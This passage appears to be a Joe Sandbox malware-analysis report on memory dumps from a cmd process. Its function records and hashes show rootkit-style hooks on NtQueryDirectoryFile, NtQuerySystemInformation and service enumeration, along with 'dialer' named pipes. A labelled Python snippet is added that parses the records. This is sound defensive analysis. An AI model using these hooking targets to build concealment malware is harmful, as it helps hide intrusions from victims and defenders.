  • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D921187B
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D9211896
  • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92118A0
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction ID: bd4d2e9c0625bbb764bc332c2e8b443fa1079459ecabe054d4ae2ed16906a027
• Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction Fuzzy Hash: CF31FE61A0074D95EBD49BA6D6EA2B923F5EB44BC0F0454219E09972DFEE3CC6B1C230

Control-flow Graph

                                                                                                                                                            control_flow_graph 128 230d90e273c-230d90e27a4 call 230d90e29d4 * 4 137 230d90e27aa-230d90e27ad 128->137 138 230d90e29b2 128->138 137->138 140 230d90e27b3-230d90e27b6 137->140 139 230d90e29b4-230d90e29d0 138->139 140->138 141 230d90e27bc-230d90e27bf 140->141 141->138 142 230d90e27c5-230d90e27e6 141->142 142->138 144 230d90e27ec-230d90e280c 142->144 145 230d90e280e-230d90e2836 144->145 146 230d90e2838-230d90e283f 144->146 145->145 145->146 147 230d90e28df-230d90e28e6 146->147 148 230d90e2845-230d90e2852 146->148 150 230d90e28ec-230d90e2901 147->150 151 230d90e2992-230d90e29b0 147->151 148->147 149 230d90e2858-230d90e286a LoadLibraryA 148->149 152 230d90e286c-230d90e2878 149->152 153 230d90e28ca-230d90e28d2 149->153 150->151 154 230d90e2907 150->154 151->139 156 230d90e28c5-230d90e28c8 152->156 153->149 157 230d90e28d4-230d90e28d9 153->157 155 230d90e290d-230d90e2921 154->155 159 230d90e2982-230d90e298c 155->159 160 230d90e2923-230d90e2934 155->160 156->153 161 230d90e287a-230d90e287d 156->161 157->147 159->151 159->155 162 230d90e293f-230d90e2943 160->162 163 230d90e2936-230d90e293d 160->163 164 230d90e287f-230d90e28a5 161->164 165 230d90e28a7-230d90e28b7 161->165 168 230d90e294d-230d90e2951 162->168 169 230d90e2945-230d90e294b 162->169 167 230d90e2970-230d90e2980 163->167 170 230d90e28ba-230d90e28c1 164->170 165->170 167->159 167->160 171 230d90e2963-230d90e2967 168->171 172 230d90e2953-230d90e2961 168->172 169->167 170->156 171->167 174 230d90e2969-230d90e296c 171->174 172->167 174->167
APIs
Memory Dump Source
• Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: d39e48a6f475af05e2240b0a3efc0b4b3904e5108dc5409c6a64f0ea3f98973b
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: 3A614532F012988BDB54CF58B1A872DBBE2F754B94F189521EE598378CDA3CD952C720

Control-flow Graph

                                                                                                                                                            control_flow_graph 383 230d9212b2c-230d9212ba5 call 230d9232ce0 386 230d9212ee0-230d9212f03 383->386 387 230d9212bab-230d9212bb1 383->387 387->386 388 230d9212bb7-230d9212bba 387->388 388->386 389 230d9212bc0-230d9212bc3 388->389 389->386 390 230d9212bc9-230d9212bd9 GetModuleHandleA 389->390 391 230d9212bdb-230d9212beb call 230d9226090 390->391 392 230d9212bed 390->392 394 230d9212bf0-230d9212c0e 391->394 392->394 394->386 397 230d9212c14-230d9212c33 StrCmpNIW 394->397 397->386 398 230d9212c39-230d9212c3d 397->398 398->386 399 230d9212c43-230d9212c4d 398->399 399->386 400 230d9212c53-230d9212c5a 399->400 400->386 401 230d9212c60-230d9212c73 400->401 402 230d9212c83 401->402 403 230d9212c75-230d9212c81 401->403 404 230d9212c86-230d9212c8a 402->404 403->404 405 230d9212c9a 404->405 406 230d9212c8c-230d9212c98 404->406 407 230d9212c9d-230d9212ca7 405->407 406->407 408 230d9212d9d-230d9212da1 407->408 409 230d9212cad-230d9212cb0 407->409 410 230d9212ed2-230d9212eda 408->410 411 230d9212da7-230d9212daa 408->411 412 230d9212cc2-230d9212ccc 409->412 413 230d9212cb2-230d9212cbf call 230d921199c 409->413 410->386 410->401 414 230d9212dbb-230d9212dc5 411->414 415 230d9212dac-230d9212db8 call 230d921199c 411->415 417 230d9212d00-230d9212d0a 412->417 418 230d9212cce-230d9212cdb 412->418 413->412 422 230d9212df5-230d9212df8 414->422 423 230d9212dc7-230d9212dd4 414->423 415->414 419 230d9212d3a-230d9212d3d 417->419 420 230d9212d0c-230d9212d19 417->420 418->417 425 230d9212cdd-230d9212cea 418->425 427 230d9212d4b-230d9212d58 lstrlenW 419->427 428 230d9212d3f-230d9212d49 call 230d9211bbc 419->428 420->419 426 230d9212d1b-230d9212d28 420->426 431 230d9212e05-230d9212e12 lstrlenW 422->431 432 230d9212dfa-230d9212e03 call 230d9211bbc 422->432 423->422 430 230d9212dd6-230d9212de3 423->430 433 230d9212ced-230d9212cf3 425->433 436 
230d9212d2b-230d9212d31 426->436 438 230d9212d7b-230d9212d8d call 230d9213844 427->438 439 230d9212d5a-230d9212d64 427->439 428->427 442 230d9212d93-230d9212d98 428->442 440 230d9212de6-230d9212dec 430->440 434 230d9212e35-230d9212e3f call 230d9213844 431->434 435 230d9212e14-230d9212e1e 431->435 432->431 450 230d9212e4a-230d9212e55 432->450 433->442 443 230d9212cf9-230d9212cfe 433->443 445 230d9212e42-230d9212e44 434->445 435->434 444 230d9212e20-230d9212e33 call 230d921152c 435->444 436->442 446 230d9212d33-230d9212d38 436->446 438->442 438->445 439->438 449 230d9212d66-230d9212d79 call 230d921152c 439->449 440->450 451 230d9212dee-230d9212df3 440->451 442->445 443->417 443->433 444->434 444->450 445->410 445->450 446->419 446->436 449->438 449->442 457 230d9212e57-230d9212e5b 450->457 458 230d9212ecc-230d9212ed0 450->458 451->422 451->440 461 230d9212e63-230d9212e7d call 230d92185c0 457->461 462 230d9212e5d-230d9212e61 457->462 458->410 464 230d9212e80-230d9212e83 461->464 462->461 462->464 466 230d9212e85-230d9212ea3 call 230d92185c0 464->466 467 230d9212ea6-230d9212ea9 464->467 466->467 467->458 470 230d9212eab-230d9212ec9 call 230d92185c0 467->470 470->458
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction ID: 4df8ad31f9d618962450b3316a6f2fc5c37ac7844519bc7728c98898d03dfda6
                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction Fuzzy Hash: 7EB1AF22A10B9886EBE49FA5D4A87B963F5F744B84F545016EE096379CDF3CCE60C360
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
• API String ID: 190073905-1786718095

Control-flow Graph

APIs
• GetLastError.KERNEL32 ref: 00000230D921CE37
• FlsGetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CE4C
• FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CE6D
• FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CE9A
• FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CEAB
• FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CEBC
• SetLastError.KERNEL32 ref: 00000230D921CED7
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF0D
• FlsSetValue.KERNEL32(?,?,00000001,00000230D921ECCC,?,?,?,?,00000230D921BF9F,?,?,?,?,?,00000230D9217AB0), ref: 00000230D921CF2C
  • Part of subcall function 00000230D921D6CC: HeapAlloc.KERNEL32 ref: 00000230D921D721
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF54
  • Part of subcall function 00000230D921D744: HeapFree.KERNEL32 ref: 00000230D921D75A
  • Part of subcall function 00000230D921D744: GetLastError.KERNEL32 ref: 00000230D921D764
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF65
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF76
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
[Control-flow graph of the function starting at 230d921a544 (basic blocks 230d921a544 through 230d921aa1b, coloured according to the Executed / Not Executed legend above). The interactive graph's node and edge listing is not reproduced here.]
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction ID: f08a9352c1be0a61195cb87c1089dd68b934e45654db61afe8aa301cfc99ad14
• Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction Fuzzy Hash: 44E19476A047888AEBA0DFA5D4D83AD77F0F745B98F100116DE8967B5DCB38C2A1C760

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of the function starting at 230d90e9944 (basic blocks 230d90e9944 through 230d90e9e1b, coloured according to the Executed / Not Executed legend above). The interactive graph's node and edge listing is not reproduced here.]
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction ID: f856906d3125aa9181ef00f8c435a7e036affc1c177897faf0a8485c7a8d94d0
• Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
• Instruction Fuzzy Hash: 29E1AC72A047488EEB60DBA5F49839D7BF0F745B88F140915FEA987B99CB38C691C710
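
The two BlockFrameHandler3::Unwind records above carry the same API String ID (849930591-393685449) but come from two different memory dumps of process 5 (bases 00000230D90E0000 and 00000230D9210000), have different Opcode IDs, and have Instruction Fuzzy Hashes that closely resemble each other. Finding such pairs by hand in a report this long is tedious. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: a parser for the record format used on this page that lists every API String ID found at more than one dump base. The sample text is copied from records on this page, trimmed to the fields the parser uses; the record structure it assumes (a record starts at each bare "APIs" heading, bullets are either "• Key: value" pairs or "Name.MODULE(args), ref: address" call lines) is inferred from those records rather than documented anywhere on the page.

```python
"""Parse the Joe Sandbox IDA-plugin function records in this report and list the
API String IDs that occur at more than one memory-dump base.
Added example; not Joe Sandbox code. Record layout is inferred from this page."""
import re
from collections import defaultdict

# Copied from this report's records (trimmed to the fields used here): the same
# CRT exception-handling routine in two dumps of process 5, plus a record whose
# "APIs" section lists resolved calls.
SAMPLE_RECORDS = """\
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
APIs
• FlsGetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D087
• FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0A6
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
"""

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Resolved call bullet: "Name.MODULE(arg,arg,...), ref: <call-site address>"
API_CALL_RE = re.compile(r"^(?P<name>[\w.:]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# Source File bullet: "<dump>.sdmp, Offset: <base>, based on PE: true|false"
SOURCE_FILE_RE = re.compile(
    r"^(?P<dump>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)$")


def parse_records(text):
    """One dict per function record; a record starts at each bare "APIs" heading.
    Leading whitespace (the extraction indents every line) is ignored. Bullets under
    "APIs" are resolved calls, under "Strings" kept verbatim, otherwise "Key: value"."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADINGS:
            if line == "APIs":
                current = {"calls": [], "strings": [], "fields": {}}
                records.append(current)
            section = line
        elif current is not None and line.startswith("• "):
            body = line[2:]
            if section == "APIs":
                m = API_CALL_RE.match(body)
                if m:
                    current["calls"].append({"name": m["name"], "ref": int(m["ref"], 16),
                                             "args": m["args"].split(",")})
            elif section == "Strings":
                current["strings"].append(body)
            else:  # the first colon ends the key, so "API ID: X::Y" splits correctly
                key, _, value = body.partition(":")
                current["fields"][key.strip()] = value.strip()
    for rec in records:  # lift the dump name and base address out of "Source File"
        m = SOURCE_FILE_RE.match(rec["fields"].get("Source File", ""))
        rec["dump"] = m["dump"] if m else None
        rec["base"] = int(m["offset"], 16) if m else None
        rec["based_on_pe"] = (m["pe"] == "true") if m else None
    return records


def duplicated_across_dumps(records):
    """API String ID -> sorted hex bases, for IDs seen at more than one dump base.
    The ID is derived only from the API ID and String ID (the "-0" suffix marks an
    empty String ID), so a match is a triage hint that the same routine sits in two
    places; confirm with the Opcode ID and Instruction Fuzzy Hash before relying on it."""
    bases = defaultdict(set)
    for rec in records:
        key = rec["fields"].get("API String ID")
        if key and rec["base"] is not None:
            bases[key].add(rec["base"])
    return {k: [hex(b) for b in sorted(v)] for k, v in bases.items() if len(v) > 1}
```

Fed the full text of this report's function records (indentation and all), `duplicated_across_dumps(parse_records(text))` returns the API String IDs worth diffing first; on the sample it returns the single BlockFrameHandler3::Unwind pair at 0x230d90e0000 and 0x230d9210000. The parsed `calls` entries keep the call-site address from the `ref:` field as an integer, so they can be compared directly against the `Offset:` base of the dump they came from.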

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction ID: 0e89d6f7a2ccd22d0932d692a2da7b91a4558e7e33ca67bb32c97b5b05e3ce74
• Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction Fuzzy Hash: 57413922B11B0451FB91CB96A8E87B523F1F745BE0F0541259E1EA778CDF3CC6598328

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: d4ee1ae639f07c050a8cb73721d7b6a406d09454b8206db8814330c6f6e88266
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: AE415C33614B8886E7A4CF61E4993AAB7B1F388B98F048119DA891775CDF3CC555CB10
APIs
• FlsGetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D087
• FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0A6
• FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0CE
• FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0DF
• FlsSetValue.KERNEL32(?,?,?,00000230D921C7DE,?,?,?,?,?,?,?,?,00000230D921CF9D,?,?,00000001), ref: 00000230D921D0F0
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction ID: b3cab89b64310a4d0faa7a1324c802c9e02f0c9f8a345d2cd7cc19bbbc6dfce8
• Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction Fuzzy Hash: 29116320F0578C81FAE8A7B555FE37962F1DB447F0F144324983966AEEDE2CD6628220
APIs
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: 62e1c2b7e757c4cac1f2192e18178f66987b5a109bcbd3d5f5159c3c55e8cb03
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: 6681C421E0034D4AFBD4ABE598F937922F8E7E5B80F144425A904A779EDB3CCB658730
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction ID: 6806f38a870ad59bd236090cf089208546bd1cf890b347db42578c6b0594e3b7
• Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction Fuzzy Hash: 1031C526A12748D1EE92DF82F4A877522F4F748BA0F6905269D1D1B39CDF3DC6658320
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction ID: 14f2e44ce155c3a00de019a6a4b9596f922b866b33e1d76f6d3aebf3a5244bbc
• Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
• Instruction Fuzzy Hash: 2F118632B10B8486E7908F96F8A832976F0F788FE4F044215EA5987799CF3CC6148754
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: 6e57c8059217a4b34d3b160b9adffff002c820da3a76c285d2d9111bb661bea7
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: 7A117C26B05B8982EF949B51E46826A72B1F748B84F04002ADE8917758EF3DC715C728
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                            • Instruction ID: 0259cc3e5bd68a47e8a417e7208c877170efcf6ce69baa622040d49fbe63052e
                                                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                                                            • Instruction Fuzzy Hash: 80D19A76614B8885DAB09B86E4E436A77F0F3C8B84F100156EACD57BA9DF3CC651CB50
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction ID: a6543722d859f4a140ddbbaf938a7370185ad0992bcea7882f1596235d3f2301
                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction Fuzzy Hash: 6531C522B01B5982E794DF96E5A873A67F1FB44B80F084121EE4857B69EF3CD6B18710
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
